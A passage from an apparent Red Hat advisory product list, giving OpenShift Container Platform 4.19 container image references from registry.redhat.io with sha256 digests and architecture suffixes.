"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:8ad00ec95b55f781061f47a2b0b7b2ae6e557bb9cdbad826c097fde6a5b7d791_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:3dc93509b8cad942ffeea32ba1c75db4b94a66a8c1a6d7b29f13ed6ec83e5f9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cluster-api-controllers-rhel9@sha256:ae91dc01aca5115ba88290f86ab266ad69b86c68c83097adafb82defdfc5c524_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:67f9c3e3f77df4be9e4925fe7c5fb4cb95d770395bbb1b32847c7100d8f9e8fe_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9-operator@sha256:ef09a660c5bd1b44464ed961ade4f9ceef47dfe1005efde15de94631dadebf4f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:d1a5ebdd8e8fcd15749e48a18cf340a309c6c219c8adf85d2df1caa773784d86_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-ebs-csi-driver-rhel9@sha256:de7f8ba8b4ed81e733af2d6b40e2dbb97c7afdc627973bfb838bd69ed9183eba_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:15b866541c161693e74ad7106aec45b9713f81e1f3e2f10deb0822b58fbb884e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-pod-identity-webhook-rhel9@sha256:240132f7cf6ec28b4f711323b5c9f10ba76e85ba0ed2e66c663096089fdcc128_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:2191714083728cc0984775c5b8c3ee972723c1378058f0923ab60036345d9825_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-controller-manager-rhel9@sha256:249b48b699ef21517d11a3533293184b1524b5907fec00593a98f0581363dc12_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:660ad818c22efdd4fb965ded889c7ed08b331cb8d50c145bd4a34e74158f790a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cloud-node-manager-rhel9@sha256:deb01110f819b3534a2bd24b5406c69bcf5011eaebdeec438a31f1cd68f18029_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:255b3979a3a054696f21f437998c892b5738cbbcdc021b0a22752f1d9bb48712_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-cluster-api-controllers-rhel9@sha256:d665a06a23572a2bcf3345f9c22b2b9895292e1f43d5532b793a3ea4df0c42c8_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:086285dd82aadc71803c847a06a2e0727b4fbb09f07a5bf95979ebc50bb95e82_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9-operator@sha256:0f5c719b22dbba95b6d61db0c63ba8107689a7d61f6944e0d2dc5fa3e693d25e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:1452416d5cfd9acae6f0bf60da783ec8cf632784655f4602462cf380cd7fe518_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-disk-csi-driver-rhel9@sha256:b13a67c30437a6950f41cdda853305d03ac24809746bdca955782db1c59824b1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:43f58c25df6d439ab60c6a7fd905db92d67678bf55732103069b9d3ce9a6ee1d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-operator-rhel9@sha256:5eca83117e60a69246033c3cedcc2e2962e0f0a6ae6d6d7e3c35546cdc78ce70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:daddd3f94f513bfce03ea0c5aa406164838aa7bc41c3251b02686fd86da09d7a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-file-csi-driver-rhel9@sha256:f1a3870617f3e6c0774b5484820351c404cabe3161684c6edf3b81554cf9f1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:4f54884bb854edec3a1a28ba089ddc068edc3ad0677637dd9b033a1c0ff8052c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-azure-workload-identity-webhook-rhel9@sha256:834a2b63a74d7af617155da8f25a36f196b7c16a78154468b1cb88a10fdfa88d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:3f79fe8b748ce5015d5d71ce8da20bbff7241868e87066d1d50083a3ceb91bfe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:66745a12cf917414d197c589e7e57a62958da4c66d5372e848e40568d8ddfafc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:900e5ff2f8ea86f0864c6a3cd1707a620427189f5bfffa0bb0ea9a8c0ed85330_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-cluster-api-controllers-rhel9@sha256:c029ff100811f13c0ba79c03044e0c6f096567511c336e4d1ecced6e900c2acd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:37fe6420e98e7d1927492a7a40fd01578cfaf441530b7bf2f85cc7d593d7b097_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:480d7e114879e0c9bcfd62250af7f2f7b4a25e7d4cca65d97c422349fe164334_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:6f49794879ad8a54b4a9ba77661ebdf84cb90a048d1472c1f878c10a9ecc46e6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-installer-rhel9@sha256:77c778debce0cb2eff5f5e66a3db3e30905e0138de3ddc3cd5330d2a79ec2cf9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:6aef6b3ea8ceb252107d24252c9c155e21d42825343e2a824d869f897a86da4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:895cb0d9b4715a75c1ffa4539bbd86c14f774e664ab16f5df4bc3e55ef537225_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:99fc0e641a6014bad4027471174578ba22c0a4a99c05b6bca1e8c838bbda0a90_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-machine-controllers-rhel9@sha256:aee32f17c4c4aa3deaca4a1884efc7c1a05d4fdadea145b247c4364e9e82086a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:07f2b6c01f22078c6b6eea7916982ebfcf6f992daf0d80af7b18972e6c484868_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:3efbeb0ba231cc16b69a86c43c28aa02b7e773413b361ceaf82c72cb215dc187_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:a212996fe27771f82406dc36d68e07e29ecf975834c3cde6395b35cd259edbe9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-rhel9-operator@sha256:b7f1f48335150e9e3ff89c0c349345f2c7fb6d7cf27793d263cca791d53f260c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:39852b09d2ff95f03cff6f39398c67d30d64366f00a0ca73319d81831b7f6e23_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:6d2dbe2a871324b770da093074a9fcac3aa590896e366354f8202bf80eae70ed_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:9df2c55943c62172a5ab42fcd2309a232a8e455240efeba614e2e70308972764_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-baremetal-runtimecfg-rhel9@sha256:e6aaec6333f15e8aa67ad391f57eb7225007c068947982d18fea6b90d837e6e2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:02c4fe2761b586f29c78d9419f0b90d98bee92b8d4fa47ec77dfe45795fab7fb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:4b1a4e3c67e3fc5c14a8cb7130eec3ea191f27473942f7afb09b497a30236947_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:a9e099fe57f31d4e86d0edbad9605aae421fbe410d1b7c2f6e7036940ba5e319_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-artifacts-rhel9@sha256:e3504f1bb6b8b89f4f01ecefc3c8646cbc949d638bfa6db0638476731d9f0e96_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:1cdfe759fe6d9b1745276957b712c1a46a69ce1c59706a7ba9ca8f3f89cc844d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:2fafd2b4c0fb8500c0180c767e55f70d26203e68500e64d252fe3a10227a161a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:5a96f6965efd6579efde9b1a1b4ae88b57cbb49f38cf2a39ef90a55470a30667_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cli-rhel9@sha256:95c126293ef394a5ce8882e8cfa9c6f6c22e9cae79e64e07f0e1e57a8fb55211_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:4e885357cb52fffbb832d31d97400cfc629f26d5c38b4692379d08ba485f46d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:645168f7cb91679d374bc1e431181a1b964dec279265ec52e5809b368e08654c_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:7c20e19cdbb62a268ffea39d5e0004fb4e6b587c41250c73180043f56b9fe0e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cloud-credential-rhel9-operator@sha256:c17396793e30858f900b68ed2981f38062d501b7600a5e4ca127d4e14113aca4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:56453e8ce0dbb39d0259d2f0b36f58d8f049bf6c1a880b8a1eaa37d8ade32067_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:6513461d1b413d648dc1d2327fac029633f5d34322459f2752d1096648fa37b4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:9a083427c52dcc2f9716408cf23991613eef7c41fb6eb1ee4841491276971039_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-api-rhel9@sha256:dcfe6ab706950430187a24e9792b6f0c270f813841e799ea7e35623679269ae5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:334e975b0d8a94ec45ade469bf86809c9a07e9456cda5d5c71d6f91a2877faa0_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:64dfc7beaf3a8cfdab85ba963db74971ca68b6cf614aa04279f4af3239806e4c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:7b99d625b14ced1fd44520bd106906dd60f84e7794257fe3b4d3a3aa685ebbbc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-authentication-rhel9-operator@sha256:8b854d27a269e0f6b6d542f652c504ab0678ac18d1b84db63078257eebe090cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
